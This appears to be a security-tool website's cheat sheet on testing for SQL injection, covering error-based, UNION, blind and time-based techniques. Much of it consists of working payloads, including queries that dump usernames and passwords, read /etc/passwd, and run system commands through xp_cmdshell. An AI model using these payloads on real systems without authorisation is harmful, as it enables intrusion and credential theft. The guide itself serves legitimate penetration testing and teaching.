$loading...
Step-by-step guide to testing for SQL injection vulnerabilities including error-based, blind, time-based, and UNION-based techniques.
Locate all parameters that interact with a database: URL parameters, POST body fields, cookies, and HTTP headers. Pay attention to search forms, login pages, and any feature that retrieves or filters data.
id=1'
search=test'
sort=name" OR 1=1--
Submit single quotes, double quotes, and special SQL characters to trigger database errors. Verbose error messages reveal the database type (MySQL, PostgreSQL, MSSQL, Oracle) and query structure.
' OR '1'='1
1' AND 1=CONVERT(int,(SELECT @@version))--
' AND extractvalue(1,concat(0x7e,(SELECT version())))--
Determine the number of columns with ORDER BY or UNION SELECT NULL. Then extract data by replacing NULL values with column names from information_schema tables.
' ORDER BY 1--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
When no visible output exists, use boolean-based blind injection. Craft conditions that cause different responses depending on whether the condition is true or false.
' AND 1=1-- (true condition)
' AND 1=2-- (false condition)
' AND SUBSTRING(username,1,1)='a'--
If boolean differences are not observable, use time delays. A delayed response confirms the injection point is vulnerable, then extract data one character at a time.
'; WAITFOR DELAY '0:0:5'--
' AND IF(1=1,SLEEP(5),0)--
' AND pg_sleep(5)--
Attempt to read sensitive data, escalate privileges, or achieve remote code execution (e.g., xp_cmdshell on MSSQL, INTO OUTFILE on MySQL). Document the injection type, affected parameter, database type, and data exposed.
' UNION SELECT load_file('/etc/passwd'),NULL--'; EXEC xp_cmdshell('whoami')--Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides